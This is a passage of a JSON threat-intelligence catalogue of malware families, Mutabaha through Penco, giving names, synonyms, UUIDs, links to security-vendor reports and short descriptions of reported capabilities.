- "https://malpedia.caad.fkie.fraunhofer.de/details/win.mutabaha",
- "http://vms.drweb.ru/virus/?_is=1&i=8477920"
- ]
- },
- "uuid": "771113e1-8550-4dc2-b2ad-7298ae381cb5",
- "value": "Mutabaha",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.mykings_spreader",
- "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators",
- "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/"
- ]
- },
- "uuid": "ec9b2bf4-1c0b-4f3c-aaa6-909b19503eed",
- "value": "MyKings Spreader",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.mylobot",
- "https://www.deepinstinct.com/2018/06/20/meet-mylobot-a-new-highly-sophisticated-never-seen-before-botnet-thats-out-in-the-wild/"
- ]
- },
- "uuid": "98d375cb-f940-4bc7-a61e-f47bdcdc48e2",
- "value": "MyloBot",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.n40",
- "https://www.slideshare.net/elevenpaths/n40-the-botnet-created-in-brazil-which-evolves-to-attack-the-chilean-banking-sector"
- ]
- },
- "uuid": "6f0109a5-7cec-4a49-8b27-e18ad5c6cae6",
- "value": "N40",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.nabucur"
- ]
- },
- "uuid": "ddf63295-cdba-4c70-a4c6-623ba2b5e6dd",
- "value": "Nabucur",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.nagini",
- "http://bestsecuritysearch.com/voldemortnagini-ransomware-virus/"
- ]
- },
- "uuid": "0ec7d065-3418-43ba-a0cc-1e06471893ad",
- "value": "Nagini",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.naikon",
- "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf",
- "https://securelist.com/analysis/publications/69953/the-naikon-apt/"
- ]
- },
- "uuid": "dfb745f1-600a-4d31-a3b0-57bd0a72ac2e",
- "value": "Naikon",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.nanocore",
- "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html",
- "https://www.bleepingcomputer.com/news/security/nanocore-rat-author-gets-33-months-in-prison/",
- "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/"
- ]
- },
- "uuid": "f9aa9004-8811-4091-a471-38f81dbcadc4",
- "value": "Nanocore RAT",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.nano_locker"
- ]
- },
- "uuid": "00e1373c-fddf-4b06-9770-e980cc0ada6b",
- "value": "NanoLocker",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.narilam",
- "http://contagiodump.blogspot.com/2012/12/nov-2012-w32narilam-sample.html",
- "https://www.symantec.com/connect/blogs/w32narilam-business-database-sabotage"
- ]
- },
- "uuid": "f5a262c7-59ed-42d1-884d-f8d29acf353f",
- "value": "Narilam",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.nautilus",
- "https://www.ncsc.gov.uk/alerts/turla-group-malware"
- ]
- },
- "uuid": "d8295eba-60ef-4900-8091-d694180de565",
- "value": "Nautilus",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.navrat",
- "https://blog.talosintelligence.com/2018/05/navrat.html?m=1"
- ]
- },
- "uuid": "ec0cad2c-0c13-491a-a869-1dc1758c8872",
- "value": "NavRAT",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "nucurs"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.necurs",
- "https://blog.avast.com/botception-with-necurs-botnet-distributes-script-with-bot-capabilities-avast-threat-labs",
- "https://www.bitsighttech.com/blog/necurs-proxy-module-with-ddos-features",
- "http://blog.talosintelligence.com/2017/03/necurs-diversifies.html",
- "https://www.blueliv.com/wp-content/uploads/2018/07/Blueliv-Necurs-report-2017.pdf",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/",
- "https://www.trustwave.com/Resources/SpiderLabs-Blog/Necurs-Recurs/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/the-new-face-of-necurs-noteworthy-changes-to-necurs-behaviors",
- "https://www.cert.pl/en/news/single/necurs-hybrid-spam-botnet/",
- "https://cofense.com/necurs-targeting-banks-pub-file-drops-flawedammyy/"
- ]
- },
- "uuid": "53ad08a6-cca9-401a-a6da-3c0bff2890eb",
- "value": "Necurs",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "Nemain"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.nemim",
- "https://securelist.com/files/2014/11/darkhotelappendixindicators_kl.pdf"
- ]
- },
- "uuid": "5ce7906e-b1fd-4860-b3e2-ac9c72033428",
- "value": "Nemim",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.netc",
- "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
- ]
- },
- "uuid": "0bc03bfa-1439-4162-bb33-ec9f8f952ee5",
- "value": "NetC",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "ScoutEagle"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.neteagle",
- "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
- ]
- },
- "uuid": "3bb8052e-8ed2-48e3-a2cf-7358bae8c6b5",
- "value": "NETEAGLE",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.netrepser_keylogger",
- "https://labs.bitdefender.com/2017/05/inside-netrepser-a-javascript-based-targeted-attack/"
- ]
- },
- "uuid": "7c6ed154-3232-4b7a-80c3-8052ce0c7333",
- "value": "Netrepser",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.netsupportmanager_rat",
- "http://www.netsupportmanager.com/index.asp",
- "https://researchcenter.paloaltonetworks.com/2017/09/unit42-hoeflertext-popups-targeting-google-chrome-users-now-pushing-rat-malware/",
- "https://www.bleepingcomputer.com/news/security/hacked-steam-accounts-spreading-remote-access-trojan/"
- ]
- },
- "uuid": "42562c47-08e1-46bc-962c-28d1831d092b",
- "value": "NetSupportManager RAT",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "TravNet"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.nettraveler",
- "https://www.proofpoint.com/us/threat-insight/post/nettraveler-apt-targets-russian-european-interests",
- "https://cdn.securelist.com/files/2014/07/kaspersky-the-net-traveler-part1-final.pdf"
- ]
- },
- "uuid": "3a26ee44-3224-48f3-aefb-3978c972d928",
- "value": "NetTraveler",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "Recam"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.netwire",
- "https://www.circl.lu/pub/tr-23/",
- "http://researchcenter.paloaltonetworks.com/2014/08/new-release-decrypting-netwire-c2-traffic/",
- "https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data",
- "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html",
- "http://blog.talosintelligence.com/2017/12/recam-redux-deconfusing-confuserex.html"
- ]
- },
- "uuid": "1acd0c6c-7aff-462e-94ff-7544b1692740",
- "value": "NetWire RC",
- "description": "Netwire is a RAT, its functionality seems focused on password stealing and keylogging, but includes remote control capabilities as well.\r\n\r\nKeylog files are stored on the infected machine in an obfuscated form. The algorithm is:\r\n\r\n for i in range(0,num_read):\r\n buffer[i] = ((buffer[i]-0x24)^0x9D)&0xFF\r\n"
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.neuron",
- "https://www.ncsc.gov.uk/alerts/turla-group-malware"
- ]
- },
- "uuid": "101c2c0e-c082-4b5a-b820-2da789e839d9",
- "value": "Neuron",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "Kasidet"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino",
- "http://securitykitten.github.io/an-evening-with-n3utrino/",
- "http://malware.dontneedcoffee.com/2014/06/neutrino-bot-aka-kasidet.html",
- "https://blog.malwarebytes.com/threat-analysis/2017/02/new-neutrino-bot-comes-in-a-protective-loader/",
- "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet",
- "https://blog.malwarebytes.com/threat-analysis/2015/08/inside-neutrino-botnet-builder/",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/credit-card-scraping-kasidet-builder-leads-to-spike-in-detections/",
- "https://www.zscaler.com/blogs/research/malicious-office-files-dropping-kasidet-and-dridex",
- "https://blog.malwarebytes.com/cybercrime/2017/01/post-holiday-spam-campaign-delivers-neutrino-bot/",
- "https://securityblog.switch.ch/2017/07/07/94-ch-li-domain-names-hijacked-and-used-for-drive-by/"
- ]
- },
- "uuid": "3760920e-4d1a-40d8-9e60-508079499076",
- "value": "Neutrino",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "Jimmy"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino_pos",
- "https://securelist.com/neutrino-modification-for-pos-terminals/78839/",
- "https://securelist.com/jimmy-nukebot-from-neutrino-with-love/81667/"
- ]
- },
- "uuid": "a954e642-4cf4-4293-a4b0-c82cf2db785d",
- "value": "Neutrino POS",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.newcore_rat",
- "https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations"
- ]
- },
- "uuid": "f18b17a7-9124-42e8-a2f2-4a1a9839aee8",
- "value": "NewCore RAT",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.newposthings",
- "https://asert.arbornetworks.com/lets-talk-about-newposthings/",
- "https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/newposthings-has-new-pos-things/",
- "http://www.cyintanalysis.com/a-quick-look-at-a-likely-newposthings-sample/"
- ]
- },
- "uuid": "48f95941-8369-4f80-b2b4-abbacd4bc411",
- "value": "NewPosThings",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.newsreels",
- "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf"
- ]
- },
- "uuid": "1d32e7c3-840e-4247-b28b-818cb1c4ae7c",
- "value": "NewsReels",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "CT"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.new_ct",
- "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf"
- ]
- },
- "uuid": "ec50a75e-81f0-48b3-b1df-215eac646421",
- "value": "NewCT",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.nexster_bot",
- "https://twitter.com/benkow_/status/789006720668405760"
- ]
- },
- "uuid": "de3aae04-130b-4c5f-b67c-03f872e76697",
- "value": "Nexster Bot",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.nexus_logger",
- "https://twitter.com/PhysicalDrive0/status/842853292124360706",
- "http://researchcenter.paloaltonetworks.com/2017/03/unit42-nexuslogger-new-cloud-based-keylogger-enters-market/"
- ]
- },
- "uuid": "dd1408ac-e288-4389-87f3-7650706f1d51",
- "value": "NexusLogger",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.ngioweb",
- "https://research.checkpoint.com/ramnits-network-proxy-servers/"
- ]
- },
- "uuid": "35fd764f-8723-4663-9bbf-5b02a64ec02e",
- "value": "Ngioweb",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitlove",
- "https://www.fireeye.com/blog/threat-research/2015/05/nitlovepos_another.html"
- ]
- },
- "uuid": "1bdd56fe-beca-4652-af39-87b5e45ae130",
- "value": "nitlove",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol",
- "https://www.trustwave.com/Resources/SpiderLabs-Blog/Tale-of-the-Two-Payloads-%E2%80%93-TrickBot-and-Nitol/"
- ]
- },
- "uuid": "e1fb348b-5e2b-4a26-95af-431065498ff5",
- "value": "Nitol",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "Bladabindi"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat",
- "https://blog.fortinet.com/2016/11/30/bladabindi-remains-a-constant-threat-by-using-dynamic-dns-services",
- "http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf",
- "http://csecybsec.com/download/zlab/20171221_CSE_Bladabindi_Report.pdf",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/",
- "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/"
- ]
- },
- "uuid": "ff611c24-289e-4f2d-88d2-cfbf771a4e4b",
- "value": "NjRAT",
- "description": "RedPacket Security describes NJRat as \"a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives.\"\r\n\r\nIt is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored."
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.nocturnalstealer",
- "https://www.proofpoint.com/us/threat-insight/post/thief-night-new-nocturnal-stealer-grabs-data-cheap"
- ]
- },
- "uuid": "94793dbc-3649-40a4-9ccc-1b32846ecb3a",
- "value": "Nocturnal Stealer",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.nokki",
- "https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/",
- "https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/"
- ]
- },
- "uuid": "f3cbe9ca-e65e-41af-8eb2-1e9877434124",
- "value": "Nokki",
- "description": "Nokki is a RAT type malware which is believe to evolve from Konni RAT. This malware has been tied to attacks containing politically-motivated lures targeting Russian and Cambodian speaking individuals or organizations. Researchers discovered a tie to the threat actor group known as Reaper also known as APT37."
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.nozelesn_decryptor"
- ]
- },
- "uuid": "6207668d-af17-44a6-97a2-e1b448264529",
- "value": "Nozelesn (Decryptor)",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.nransom",
- "https://twitter.com/malwrhunterteam/status/910952333084971008",
- "https://motherboard.vice.com/en_us/article/yw3w47/this-ransomware-demands-nudes-instead-of-bitcoin",
- "https://www.kaspersky.com/blog/nransom-nude-ransomware/18597/"
- ]
- },
- "uuid": "b9c767c7-a1e8-476a-8032-9686d51df7de",
- "value": "nRansom",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [
- "nymain"
- ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim",
- "https://www.cert.pl/en/news/single/nymaim-revisited/",
- "https://arielkoren.com/blog/2016/11/02/nymaim-deep-technical-dive-adventures-in-evasive-malware/",
- "https://public.gdatasoftware.com/Web/Landingpages/DE/GI-Spring2014/slides/004_plohmann.pdf",
- "https://bitbucket.org/daniel_plohmann/idapatchwork"
- ]
- },
- "uuid": "9b5255c6-44e5-4ec3-bc03-7e00e220c937",
- "value": "Nymaim",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim2",
- "https://johannesbader.ch/2018/04/the-new-domain-generation-algorithm-of-nymaim/"
- ]
- },
- "uuid": "c8e8392f-883e-412e-9b0b-02137d0875da",
- "value": "Nymaim2",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.oddjob"
- ]
- },
- "uuid": "d8305201-9fec-4e6b-9eec-7ebb756364e2",
- "value": "OddJob",
- "description": ""
- },
- {
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.odinaff",
- 
"https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks" - ] - }, - "uuid": "045df65f-77fe-4880-af34-62ca33936c6e", - "value": "Odinaff", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.olympic_destroyer", - "http://blog.talosintelligence.com/2018/02/olympic-destroyer.html", - "https://www.lastline.com/labsblog/olympic-destroyer-south-korea/", - "https://securelist.com/the-devils-in-the-rich-header/84348/", - "https://cyber.wtf/2018/03/28/dissecting-olympic-destroyer-a-walk-through/", - "https://securelist.com/olympic-destroyer-is-still-alive/86169/", - "http://blog.talosintelligence.com/2018/02/who-wasnt-responsible-for-olympic.html", - "https://www.lastline.com/labsblog/attribution-from-russia-with-code/", - "https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/" - ] - }, - "uuid": "f3ba8a50-0105-4aa9-90b2-01df15f50b28", - "value": "Olympic Destroyer", - "description": "Malware which seems to have no function other than to disrupt computer systems related to the 2018 Winter Olympic event." 
- }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.onekeylocker", - "https://twitter.com/malwrhunterteam/status/1001461507513880576" - ] - }, - "uuid": "838e2a3a-c4cb-4bee-b07f-c97b143c68d6", - "value": "OneKeyLocker", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.onhat", - "https://docs.google.com/spreadsheets/d/1H9_xaxQHpWaa4O_Son4Gx0YOIzlcBWMsdvePFX68EKU/htmlview" - ] - }, - "uuid": "82733125-da67-44ff-b2ac-b16226088211", - "value": "ONHAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.onionduke", - "http://contagiodump.blogspot.com/2014/11/onionduke-samples.html", - "https://www.f-secure.com/weblog/archives/00002764.html" - ] - }, - "uuid": "abd10caa-7d4c-4c22-8dae-8d32f13232d7", - "value": "OnionDuke", - "description": "OnionDuke is a new sophisticated piece of malware distributed by threat actors through a malicious exit node on the Tor anonymity network appears to be related to the notorious MiniDuke, researchers at F-Secure discovered. According to experts, since at least February 2014, the threat actors have also distributed the threat through malicious versions of pirated software hosted on torrent websites. " - }, - { - "meta": { - "synonyms": [ - "SBot", - "Onliner" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.onliner", - "https://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html" - ] - }, - "uuid": "6cf05dad-86c8-4f46-b5b8-0a004360563f", - "value": "OnlinerSpambot", - "description": "A spambot that has been observed being used for spreading Ursninf, Zeus Panda, Andromeda or Netflix phishing against Italy and Canada." 
- }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.oopsie", - "https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/", - "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr" - ] - }, - "uuid": "d07c3def-91af-4d9b-bdf7-62c9e0b44968", - "value": "OopsIE", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.opachki", - "http://contagiodump.blogspot.com/2010/03/march-2010-opachki-trojan-update-and.html", - "http://contagiodump.blogspot.com/2009/11/win32opachkia-trojan-that-removes-zeus.html", - "https://isc.sans.edu/diary/Opachki%2C+from+%28and+to%29+Russia+with+love/7519", - "https://forum.malekal.com/viewtopic.php?t=21806" - ] - }, - "uuid": "f50de0a8-35a7-406e-9f53-8f7d5448e1e7", - "value": "Opachki", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.opghoul", - "https://securelist.com/blog/research/75718/operation-ghoul-targeted-attacks-on-industrial-and-engineering-organizations/" - ] - }, - "uuid": "25a280b2-0260-4593-bf8c-7062dfdc6c38", - "value": "OpGhoul", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.op_blockbuster", - "http://researchcenter.paloaltonetworks.com/2017/04/unit42-the-blockbuster-sequel/" - ] - }, - "uuid": "25c962c5-5616-4fe3-ad44-68c4ac4c726d", - "value": "OpBlockBuster", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcarat", - "http://pwc.blogs.com/cyber_security_updates/2014/10/orcarat-a-whale-of-a-tale.html" - ] - }, - "uuid": "08103f1c-f83d-4037-a1ae-109b06f79226", - "value": "OrcaRAT", - 
"description": "OrcaRAT is a Backdoor that targets the Windows platform. It has been reported that a variant of this malware has been used in a targeted attack. It contacts a remote server, sending system information. Moreover, it receives control commands to execute shell commands, and download/upload a file, among other actions." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcus_rat", - "https://orcustechnologies.com/", - "https://krebsonsecurity.com/2016/07/canadian-man-is-author-of-popular-orcus-rat/", - "http://researchcenter.paloaltonetworks.com/2016/08/unit42-orcus-birth-of-an-unusual-plugin-builder-rat/", - "https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitcoin-investors" - ] - }, - "uuid": "c41e7fdd-f1b1-4b87-97d7-634202af8b61", - "value": "Orcus RAT", - "description": "Orcus has been advertised as a Remote Administration Tool (RAT) since early 2016. It has all the features that would be expected from a RAT and probably more. The long list of the commands is documented on their website. But what separates Orcus from the others is its capability to load custom plugins developed by users, as well as plugins that are readily available from the Orcus repository. In addition to that, users can also execute C# and VB.net code on the remote machine in real-time." 
- }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ordinypt", - "https://www.gdata.de/blog/2017/11/30151-ordinypt", - "https://www.bleepingcomputer.com/news/security/ordinypt-ransomware-intentionally-destroys-files-currently-targeting-germany/" - ] - }, - "uuid": "7fd96553-4c78-43de-824f-82645ed4fac5", - "value": "Ordinypt", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.overlay_rat", - "https://securityintelligence.com/overlay-rat-malware-uses-autoit-scripting-to-bypass-antivirus-detection/", - "https://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking" - ] - }, - "uuid": "842687f5-91bc-4719-ac3f-4166ae02e0cd", - "value": "Overlay RAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ovidiystealer", - "https://www.proofpoint.com/us/threat-insight/post/meet-ovidiy-stealer-bringing-credential-theft-masses" - ] - }, - "uuid": "30d49b12-0dca-4652-9f7a-4d0cf7555375", - "value": "OvidiyStealer", - "description": "" - }, - { - "meta": { - "synonyms": [ - "luckyowa" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.owaauth", - "https://threatpost.com/targeted-attack-exposes-owa-weakness/114925/" - ] - }, - "uuid": "37f66fcc-e093-4d97-902d-c96602a7d234", - "value": "owaauth", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.padcrypt", - "https://www.bleepingcomputer.com/news/security/padcrypt-the-first-ransomware-with-live-support-chat-and-an-uninstaller/", - "https://johannesbader.ch/2016/03/the-dga-of-padcrypt/" - ] - }, - "uuid": "c21335f5-b145-4029-b1bc-161362c7ce80", - "value": "PadCrypt", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ 
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.paladin", - "https://bitbucket.org/cybertools/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf", - "https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html" - ] - }, - "uuid": "c6728a76-f4d9-4c49-a3aa-be895df13a35", - "value": "paladin", - "description": "Paladin RAT is a variant of Gh0st RAT used by PittyPanda active since at least 2011." - }, - { - "meta": { - "synonyms": [ - "ZeusPanda" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.pandabanker", - "https://github.com/JR0driguezB/malware_configs/tree/master/PandaBanker", - "https://cyber.wtf/2017/02/03/zeus-panda-webinjects-a-case-study/", - "https://www.proofpoint.com/us/threat-insight/post/zeus-panda-banking-trojan-targets-online-holiday-shoppers", - "https://www.proofpoint.com/tw/threat-insight/post/panda-banker-new-banking-trojan-hits-the-market", - "https://f5.com/labs/articles/threat-intelligence/malware/panda-malware-broadens-targets-to-cryptocurrency-exchanges-and-social-media", - "https://www.arbornetworks.com/blog/asert/panda-bankers-future-dga/", - "https://www.spamhaus.org/news/article/771/", - "https://www.vkremez.com/2018/08/lets-learn-dissecting-panda-banker.html", - "http://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html", - "https://blogs.forcepoint.com/security-labs/zeus-panda-delivered-sundown-targets-uk-banks", - "https://www.arbornetworks.com/blog/asert/panda-banker-zeros-in-on-japanese-targets/", - "https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf", - "https://www.arbornetworks.com/blog/asert/let-pandas-zeus-zeus-zeus-zeus/", - "http://www.vkremez.com/2018/01/lets-learn-dissect-panda-banking.html", - "https://cyber.wtf/2017/03/13/zeus-panda-webinjects-dont-trust-your-eyes/" - ] - }, - "uuid": "31ebe294-f125-4cf3-95cc-f4150ab23303", - "value": "PandaBanker", - "description": "According to Arbor, Forcepoint and Proofpoint, Panda is a variant 
of the well-known Zeus banking trojan(*). Fox IT discovered it in February 2016.\r\n\r\nThis banking trojan uses the infamous ATS (Automatic Transfer System/Scripts) to automate online bank portal actions.\r\n\r\nThe baseconfig (c2, crypto material, botnet name, version) is embedded in the malware itself. It then obtains a dynamic config from the c2, with further information about how to grab the webinjects and additional modules, such as vnc, backsocks and grabber.\r\n\r\nPanda does have some DGA implemented, but according to Arbor, a bug prevents it from using it." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.parasite_http", - "https://www.proofpoint.com/us/threat-insight/post/parasite-http-rat-cooks-stew-stealthy-tricks" - ] - }, - "uuid": "c5eee19f-0877-4709-86ea-328e346af1bf", - "value": "parasite_http", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.penco" - ] - }, - "uuid": 